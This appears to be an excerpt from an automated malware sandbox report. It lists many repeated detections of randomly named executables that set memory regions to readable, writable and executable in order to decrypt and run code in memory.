matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2000
process_name: UfmkLek.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2208
process_name: MaprHdx.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 940
process_name: JPzdVyd.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2528
process_name: KdggEVI.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 952
process_name: VwdfFJt.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2596
process_name: CRcNZVo.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 568
process_name: IXUptjB.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 3024
process_name: pIzHgOO.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 3044
process_name: uMjqrEB.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1876
process_name: sEgtnBe.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2888
process_name: yZCFVGB.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2200
process_name: ExdKeaE.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 256
process_name: bcPoyuc.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1964
process_name: iBJwesG.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2892
process_name: MOSoBow.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2204
process_name: IhAbDZN.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1512
process_name: tBgBbnQ.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2868
process_name: HvsZicl.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2808
process_name: iQKkOox.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 676
process_name: XEOFqKg.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2592
process_name: NJPyHCi.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1932
process_name: gfRmnmy.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 3052
process_name: CAMmSlI.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2732
process_name: pdXNVaf.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2552
process_name: tSxAjyb.exe
rulename: Modify memory region to readable, writable and executable